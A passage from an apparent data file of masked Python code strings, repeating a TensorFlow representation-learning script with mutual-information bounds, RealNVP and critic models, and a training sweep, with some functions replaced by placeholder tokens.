exp_name,\n nets_name, critic_name, loss_name, i))\n if kwargs.get('compute_jacobian', False):\n results_with_singular_values.append((ResultsConfig(\n nets_name, critic_name, loss_name), results_per_run))\n return {'df': pd.concat(data_frames), 'singular_values':\n results_with_singular_values}\n\n\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n\n\ndef acti_func(x, a, b, c):\n x = tf.stop_gradient(x)\n alpha = tf.zeros_like(x)\n alpha = tf.where(x <= b, -a * x / b + a, alpha)\n alpha = tf.where((x > b) & (x < c), 0.0, alpha)\n alpha = tf.where(x >= c, a * x / (1 - c) + a * c / (c - 1), alpha)\n return alpha\n\n\ndef convert_to_data_frame(result, exp_name, nets, critic, loss, seed):\n \"\"\"Convert results class to a data frame.\"\"\"\n label = '{}, {}, {}'.format(nets, critic, loss)\n rows = list(zip(itertools.repeat(exp_name), itertools.repeat(nets),\n itertools.repeat(critic), itertools.repeat(loss), itertools.repeat(\n seed), result.iterations, [(-loss) for loss in result.\n testing_losses], result.classification_accuracies, itertools.repeat\n (label)))\n df_eval = pd.DataFrame(rows, columns=('exp_name', 'nets', 'Critic',\n 'Estimator', 'run', 'iteration', 'bound_value', 'accuracy', 'label'))\n df_eval['Estimator'] = df_eval['Estimator'].replace(to_replace={'cpc':\n '$CPC$', 'pcc': '$PCC$', 'drfc': '$D-RFC$', 'wpc': '$WPC$'})\n df_eval['Critic'] = df_eval['Critic'].replace(to_replace={'concat':\n 'MLP', 'separable': 'Separable', 'innerprod': 'Inner product',\n 'bilinear': 'Bilinear'})\n return df_eval\n\n\ndef apply_default_style(ax):\n ax.set_xlim([0, 20001])\n ax.get_xaxis().set_major_formatter(FuncFormatter(lambda x, p: format(\n int(x / 1000), ',')))\n ax.set_xlabel('Training steps (in thousands)')\n plt.tick_params(top=False, right=False, bottom=False, left=False)\n handles, labels = ax.get_legend_handles_labels()\n plt.legend(loc='lower right', handles=handles[1:], labels=labels[1:])\n\n\ndef get_testing_loss(x_array, session, loss, data_ph, dims, batch_size=512):\n total_loss = 0\n for i in range(0, x_array.shape[0], batch_size):\n x_slice = x_array[i:i + batch_size, :dims]\n total_loss += x_slice.shape[0] * session.run(loss, feed_dict={\n data_ph: x_slice})\n return total_loss / x_array.shape[0]\n\n\ndef get_classification_accuracy(session, codes, data_ph, dims):\n x_train_mapped = map_data(x_train, session, codes, data_ph, dims)\n x_test_mapped = map_data(x_test, session, codes, data_ph, dims)\n accuracy = logistic_fit(x_train_mapped, y_train, x_test_mapped, y_test)\n return accuracy\n\n\n<function token>\n\n\ndef reduce_logmeanexp_nodiag(x, axis=None):\n batch_size = x.shape[0]\n logsumexp = tf.reduce_logsumexp(input_tensor=x - tf.linalg.tensor_diag(\n np.inf * tf.ones(batch_size)), axis=axis)\n if axis:\n num_elem = batch_size - 1.0\n else:\n num_elem = batch_size * (batch_size - 1.0)\n return logsumexp - tf.math.log(num_elem)\n\n\ndef tuba_lower_bound(scores, log_baseline=None):\n if log_baseline is not None:\n scores -= log_baseline[:, None]\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n marg_term = tf.exp(reduce_logmeanexp_nodiag(scores))\n return 1.0 + joint_term - marg_term\n\n\n<function token>\n\n\[email protected]\ndef js_fgan_lower_bound(f):\n \"\"\"Lower bound on Jensen-Shannon divergence from Nowozin et al. (2016).\"\"\"\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n n = tf.cast(f.shape[0], tf.float32)\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.\n softplus(f_diag))) / (n * (n - 1.0))\n return first_term - second_term\n\n\[email protected]\ndef infonce_lower_bound(scores):\n \"\"\"InfoNCE lower bound from van den Oord et al. (2018).\"\"\"\n nll = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores) - tf.\n reduce_logsumexp(input_tensor=scores, axis=1))\n mi = tf.math.log(tf.cast(scores.shape[0], tf.float32)) + nll\n return mi\n\n\[email protected]\ndef our_lower_bound(scores):\n \"\"\"Our lower bound\"\"\"\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n scores_sq = scores ** 2\n marg_num = batch_size * (batch_size - 1.0)\n marg_term = tf.reduce_sum(input_tensor=scores_sq) - tf.reduce_sum(\n input_tensor=tf.linalg.diag_part(scores_sq))\n marg_term = marg_term / marg_num\n return joint_term - 0.5 * marg_term\n\n\[email protected]\ndef skew_js_fgan_lower_bound(f):\n \"\"\"skewed js lower bound (true cross entropy)\"\"\"\n n = tf.cast(f.shape[0], tf.float32)\n alpha = 1 / n\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.\n softplus(f_diag))) / (n * (n - 1.0))\n return alpha * first_term - (1 - alpha) * second_term\n\n\[email protected]\ndef label_smooth_pcc(f):\n \"\"\" pcc with label smoothing trick\"\"\"\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels, [-1, 1])\n labels = (1.0 - args.smoothing) * labels + args.smoothing / 2\n pre_prob = tf.reshape(tf.sigmoid(f), [-1, 1])\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(labels, pre_prob)\n\n\n<function token>\n<function token>\n<function token>\n\n\ndef logistic_fit(x_train, y_train, x_test, y_test):\n logistic_regressor = sk_linear.LogisticRegression(solver='saga',\n multi_class='multinomial', tol=0.1, C=10.0)\n from sklearn.preprocessing import MinMaxScaler\n scaler = MinMaxScaler()\n x_train = scaler.fit_transform(x_train)\n x_test = scaler.transform(x_test)\n logistic_regressor.fit(x_train, y_train.ravel())\n return logistic_regressor.score(x_test, y_test.ravel())\n\n\n<code token>\n\n\ndef map_fn(example):\n image = example[FEATURE_INPUT]\n image = tf.cast(image, tf.float32) / 255.0\n image = tf.reshape(image, [-1])\n label = example[FEATURE_LABEL]\n return {FEATURE_INPUT: image, FEATURE_LABEL: label}\n\n\n<function token>\n\n\ndef tfds_to_np(dataset):\n features = list(tfds.as_numpy(dataset))\n images = np.stack([f[FEATURE_INPUT].ravel() for f in features])\n labels = np.stack([f[FEATURE_LABEL].ravel() for f in features])\n return images, labels\n\n\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n\n\nclass MLP(tf.keras.Model):\n\n def __init__(self, layer_dimensions, shortcuts, dense_kwargs={}):\n super(MLP, self).__init__()\n self._layers = [tfkl.Dense(dimensions, **dense_kwargs) for\n dimensions in layer_dimensions[:-1]]\n dense_kwargs_copy = copy.deepcopy(dense_kwargs)\n dense_kwargs_copy['activation'] = None\n self._layers.append(tfkl.Dense(layer_dimensions[-1], **\n dense_kwargs_copy))\n self._shortcuts = shortcuts\n\n @property\n def layers(self):\n return self._layers\n\n def __call__(self, inputs):\n x = inputs\n for layer in self.layers:\n x = layer(x) + x if self._shortcuts else layer(x)\n return x\n\n\nclass LayerNorm(tfkl.Layer):\n \"\"\" Layer Normalization in the style of https://arxiv.org/abs/1607.06450 \"\"\"\n\n def __init__(self, scale_initializer='ones', bias_initializer='zeros',\n axes=[1, 2, 3], epsilon=1e-06, **kwargs):\n super(LayerNorm, self).__init__(**kwargs)\n self.epsilon = epsilon\n self.scale_initializer = tf.keras.initializers.get(scale_initializer)\n self.bias_initializer = tf.keras.initializers.get(bias_initializer)\n self.axes = axes\n\n def build(self, input_shape):\n self.scale = self.add_weight(shape=(input_shape[-1],), initializer=\n self.scale_initializer, trainable=True, name='{}_scale'.format(\n self.name))\n self.bias = self.add_weight(shape=(input_shape[-1],), initializer=\n self.bias_initializer, trainable=True, name='{}_bias'.format(\n self.name))\n self.built = True\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\ndef real_nvp_default_template(hidden_layers, shift_only=False, activation=\n tf.nn.relu, name=None, *args, **kwargs):\n with tf.compat.v1.name_scope(name or 'real_nvp_default_template'):\n\n def _fn(x, output_units, **condition_kwargs):\n \"\"\"Fully connected MLP parameterized via `real_nvp_template`.\"\"\"\n if condition_kwargs:\n raise NotImplementedError(\n 'Conditioning not implemented in the default template.')\n if tensorshape_util.rank(x.shape) == 1:\n x = x[tf.newaxis, ...]\n reshape_output = lambda x: x[0]\n else:\n reshape_output = lambda x: x\n for units in hidden_layers:\n x = tf1.layers.dense(*args, inputs=x, units=units,\n activation=activation, **kwargs)\n x = tf1.layers.dense(*args, inputs=x, units=(1 if shift_only else\n 2) * output_units, activation=None, **kwargs)\n if shift_only:\n return reshape_output(x), None\n shift, log_scale = tf.split(x, 2, axis=-1)\n return reshape_output(shift), 1e-07 + tf.nn.softplus(reshape_output\n (log_scale))\n return tf1.make_template('real_nvp_default_template', _fn)\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\ndef train(g1, g2, critic, loss_fn, learning_rate, batch_size=\n TRAIN_BATCH_SIZE, n_iters=15000, n_evals=15, compute_jacobian=False,\n noise_std=0.0, data_dimensions=DIMS // 2, n_iter=1, loss_name='InfoNCE'):\n \"\"\"Runs the training loop for a fixed model.\n\n Args:\n g1: Function, maps input1 to representation.\n g2: Function, maps input2 to representation.\n critic: Function, maps two representations to scalar.\n loss_fn: Function, mutual information estimator.\n learning_rate: Learning rate.\n batch_size: Training batch size.\n n_iters: Number of optimization iterations.\n n_evals: Number of model evaluations.\n compute_jacobian: Whether to estimate the singular values of the Jacobian.\n noise_std: Standard deviation for the Gaussian noise. Default is 0.0.\n data_dimensions: The dimension of the data. By default it's half of the\n original data dimension.\n Returns:\n Returns and instance of `Results` tuple.\n \"\"\"\n x_1, x_2, _ = processed_train_data(data_dimensions, batch_size)\n if noise_std > 0.0:\n assert x_1.shape == x_2.shape, 'X1 and X2 shapes must agree to add noise!'\n noise = noise_std * tf.random.normal(x_1.shape)\n x_1 += noise\n x_2 += noise\n code_1, code_2 = g1(x_1), g2(x_2)\n critic_matrix = critic(code_1, code_2)\n if compute_jacobian:\n jacobian = gradients.batch_jacobian(code_1, x_1, use_pfor=False)\n singular_values = tf.linalg.svd(jacobian, compute_uv=False)\n loss = loss_fn(critic_matrix)\n optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=learning_rate)\n if not loss_name == 'wpc':\n optimizer_op = optimizer.minimize(loss)\n else:\n gvs = optimizer.compute_gradients(loss)\n capped_gvs = [(tf.clip_by_value(grad, -1.0, 1.0), var) for grad,\n var in gvs]\n optimizer_op = optimizer.apply_gradients(capped_gvs)\n with tf.compat.v1.Session() as session:\n session.run(tf.compat.v1.global_variables_initializer())\n data_ph = tf.compat.v1.placeholder(tf.float32, shape=[None,\n data_dimensions])\n data_ph_noisy = data_ph + noise_std * tf.random.normal(tf.shape(\n input=data_ph))\n codes = g1(data_ph_noisy)\n (training_losses, testing_losses, classification_accuracies, iters,\n sigmas) = [], [], [], [], []\n for iter_n in range(n_iters):\n if iter_n % (n_iters // n_evals) == 0:\n iters.append(iter_n)\n accuracy = get_classification_accuracy(session, codes,\n data_ph, data_dimensions)\n classification_accuracies.append(accuracy)\n testing_losses.append(get_testing_loss(x_test, session,\n loss, data_ph, data_dimensions))\n if compute_jacobian:\n sigmas.append(session.run(singular_values))\n print(\n '{:d}th iter Loss_name {} Step {:>10d} fit {:>.5f} DS {} B {:d} lr {:f}'\n .format(n_iter, loss_name, iter_n, accuracy, args.\n dataset, args.batch_size, args.lr))\n loss_np, _ = session.run([loss, optimizer_op])\n training_losses.append(loss_np)\n return Results(iterations=iters, training_losses=training_losses,\n testing_losses=testing_losses, classification_accuracies=\n classification_accuracies, singular_values=sigmas)\n\n\ndef run_sweep(nets, critics, loss_fns, exp_name, **kwargs):\n \"\"\"Runs the sweep across encoder networks, critics, and the estimators.\"\"\"\n grid = itertools.product(nets, critics, loss_fns)\n data_frames = []\n results_with_singular_values = []\n for nets_name, critic_name, loss_name in grid:\n print('[New experiment] encoder: {}, critic: {}, loss: {}'.format(\n nets_name, critic_name, loss_name))\n with tf.Graph().as_default():\n g1, g2 = nets[nets_name]()\n critic = critics[critic_name]()\n loss_fn = loss_fns[loss_name]\n results_per_run = []\n for n in range(NRUNS):\n try:\n print('{:d}th run, loss: {}'.format(n, loss_name))\n if loss_name == 'drfc' and TFDS_NAME == 'cifar10':\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n else:\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n results_per_run.append(results)\n except Exception as ex:\n print('Run {} failed! Error: {}'.format(n, ex))\n for i, result in enumerate(results_per_run):\n data_frames.append(convert_to_data_frame(result, exp_name,\n nets_name, critic_name, loss_name, i))\n if kwargs.get('compute_jacobian', False):\n results_with_singular_values.append((ResultsConfig(\n nets_name, critic_name, loss_name), results_per_run))\n return {'df': pd.concat(data_frames), 'singular_values':\n results_with_singular_values}\n\n\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n\n\ndef acti_func(x, a, b, c):\n x = tf.stop_gradient(x)\n alpha = tf.zeros_like(x)\n alpha = tf.where(x <= b, -a * x / b + a, alpha)\n alpha = tf.where((x > b) & (x < c), 0.0, alpha)\n alpha = tf.where(x >= c, a * x / (1 - c) + a * c / (c - 1), alpha)\n return alpha\n\n\ndef convert_to_data_frame(result, exp_name, nets, critic, loss, seed):\n \"\"\"Convert results class to a data frame.\"\"\"\n label = '{}, {}, {}'.format(nets, critic, loss)\n rows = list(zip(itertools.repeat(exp_name), itertools.repeat(nets),\n itertools.repeat(critic), itertools.repeat(loss), itertools.repeat(\n seed), result.iterations, [(-loss) for loss in result.\n testing_losses], result.classification_accuracies, itertools.repeat\n (label)))\n df_eval = pd.DataFrame(rows, columns=('exp_name', 'nets', 'Critic',\n 'Estimator', 'run', 'iteration', 'bound_value', 'accuracy', 'label'))\n df_eval['Estimator'] = df_eval['Estimator'].replace(to_replace={'cpc':\n '$CPC$', 'pcc': '$PCC$', 'drfc': '$D-RFC$', 'wpc': '$WPC$'})\n df_eval['Critic'] = df_eval['Critic'].replace(to_replace={'concat':\n 'MLP', 'separable': 'Separable', 'innerprod': 'Inner product',\n 'bilinear': 'Bilinear'})\n return df_eval\n\n\ndef apply_default_style(ax):\n ax.set_xlim([0, 20001])\n ax.get_xaxis().set_major_formatter(FuncFormatter(lambda x, p: format(\n int(x / 1000), ',')))\n ax.set_xlabel('Training steps (in thousands)')\n plt.tick_params(top=False, right=False, bottom=False, left=False)\n handles, labels = ax.get_legend_handles_labels()\n plt.legend(loc='lower right', handles=handles[1:], labels=labels[1:])\n\n\ndef get_testing_loss(x_array, session, loss, data_ph, dims, batch_size=512):\n total_loss = 0\n for i in range(0, x_array.shape[0], batch_size):\n x_slice = x_array[i:i + batch_size, :dims]\n total_loss += x_slice.shape[0] * session.run(loss, feed_dict={\n data_ph: x_slice})\n return total_loss / x_array.shape[0]\n\n\ndef get_classification_accuracy(session, codes, data_ph, dims):\n x_train_mapped = map_data(x_train, session, codes, data_ph, dims)\n x_test_mapped = map_data(x_test, session, codes, data_ph, dims)\n accuracy = logistic_fit(x_train_mapped, y_train, x_test_mapped, y_test)\n return accuracy\n\n\n<function token>\n\n\ndef reduce_logmeanexp_nodiag(x, axis=None):\n batch_size = x.shape[0]\n logsumexp = tf.reduce_logsumexp(input_tensor=x - tf.linalg.tensor_diag(\n np.inf * tf.ones(batch_size)), axis=axis)\n if axis:\n num_elem = batch_size - 1.0\n else:\n num_elem = batch_size * (batch_size - 1.0)\n return logsumexp - tf.math.log(num_elem)\n\n\ndef tuba_lower_bound(scores, log_baseline=None):\n if log_baseline is not None:\n scores -= log_baseline[:, None]\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n marg_term = tf.exp(reduce_logmeanexp_nodiag(scores))\n return 1.0 + joint_term - marg_term\n\n\n<function token>\n\n\[email protected]\ndef js_fgan_lower_bound(f):\n \"\"\"Lower bound on Jensen-Shannon divergence from Nowozin et al. (2016).\"\"\"\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n n = tf.cast(f.shape[0], tf.float32)\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.\n softplus(f_diag))) / (n * (n - 1.0))\n return first_term - second_term\n\n\[email protected]\ndef infonce_lower_bound(scores):\n \"\"\"InfoNCE lower bound from van den Oord et al. (2018).\"\"\"\n nll = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores) - tf.\n reduce_logsumexp(input_tensor=scores, axis=1))\n mi = tf.math.log(tf.cast(scores.shape[0], tf.float32)) + nll\n return mi\n\n\[email protected]\ndef our_lower_bound(scores):\n \"\"\"Our lower bound\"\"\"\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n scores_sq = scores ** 2\n marg_num = batch_size * (batch_size - 1.0)\n marg_term = tf.reduce_sum(input_tensor=scores_sq) - tf.reduce_sum(\n input_tensor=tf.linalg.diag_part(scores_sq))\n marg_term = marg_term / marg_num\n return joint_term - 0.5 * marg_term\n\n\n<function token>\n\n\[email protected]\ndef label_smooth_pcc(f):\n \"\"\" pcc with label smoothing trick\"\"\"\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels, [-1, 1])\n labels = (1.0 - args.smoothing) * labels + args.smoothing / 2\n pre_prob = tf.reshape(tf.sigmoid(f), [-1, 1])\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(labels, pre_prob)\n\n\n<function token>\n<function token>\n<function token>\n\n\ndef logistic_fit(x_train, y_train, x_test, y_test):\n logistic_regressor = sk_linear.LogisticRegression(solver='saga',\n multi_class='multinomial', tol=0.1, C=10.0)\n from sklearn.preprocessing import MinMaxScaler\n scaler = MinMaxScaler()\n x_train = scaler.fit_transform(x_train)\n x_test = scaler.transform(x_test)\n logistic_regressor.fit(x_train, y_train.ravel())\n return logistic_regressor.score(x_test, y_test.ravel())\n\n\n<code token>\n\n\ndef map_fn(example):\n image = example[FEATURE_INPUT]\n image = tf.cast(image, tf.float32) / 255.0\n image = tf.reshape(image, [-1])\n label = example[FEATURE_LABEL]\n return {FEATURE_INPUT: image, FEATURE_LABEL: label}\n\n\n<function token>\n\n\ndef tfds_to_np(dataset):\n features = list(tfds.as_numpy(dataset))\n images = np.stack([f[FEATURE_INPUT].ravel() for f in features])\n labels = np.stack([f[FEATURE_LABEL].ravel() for f in features])\n return images, labels\n\n\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n\n\nclass MLP(tf.keras.Model):\n\n def __init__(self, layer_dimensions, shortcuts, dense_kwargs={}):\n super(MLP, self).__init__()\n self._layers = [tfkl.Dense(dimensions, **dense_kwargs) for\n dimensions in layer_dimensions[:-1]]\n dense_kwargs_copy = copy.deepcopy(dense_kwargs)\n dense_kwargs_copy['activation'] = None\n self._layers.append(tfkl.Dense(layer_dimensions[-1], **\n dense_kwargs_copy))\n self._shortcuts = shortcuts\n\n @property\n def layers(self):\n return self._layers\n\n def __call__(self, inputs):\n x = inputs\n for layer in self.layers:\n x = layer(x) + x if self._shortcuts else layer(x)\n return x\n\n\nclass LayerNorm(tfkl.Layer):\n \"\"\" Layer Normalization in the style of https://arxiv.org/abs/1607.06450 \"\"\"\n\n def __init__(self, scale_initializer='ones', bias_initializer='zeros',\n axes=[1, 2, 3], epsilon=1e-06, **kwargs):\n super(LayerNorm, self).__init__(**kwargs)\n self.epsilon = epsilon\n self.scale_initializer = tf.keras.initializers.get(scale_initializer)\n self.bias_initializer = tf.keras.initializers.get(bias_initializer)\n self.axes = axes\n\n def build(self, input_shape):\n self.scale = self.add_weight(shape=(input_shape[-1],), initializer=\n self.scale_initializer, trainable=True, name='{}_scale'.format(\n self.name))\n self.bias = self.add_weight(shape=(input_shape[-1],), initializer=\n self.bias_initializer, trainable=True, name='{}_bias'.format(\n self.name))\n self.built = True\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\ndef real_nvp_default_template(hidden_layers, shift_only=False, activation=\n tf.nn.relu, name=None, *args, **kwargs):\n with tf.compat.v1.name_scope(name or 'real_nvp_default_template'):\n\n def _fn(x, output_units, **condition_kwargs):\n \"\"\"Fully connected MLP parameterized via `real_nvp_template`.\"\"\"\n if condition_kwargs:\n raise NotImplementedError(\n 'Conditioning not implemented in the default template.')\n if tensorshape_util.rank(x.shape) == 1:\n x = x[tf.newaxis, ...]\n reshape_output = lambda x: x[0]\n else:\n reshape_output = lambda x: x\n for units in 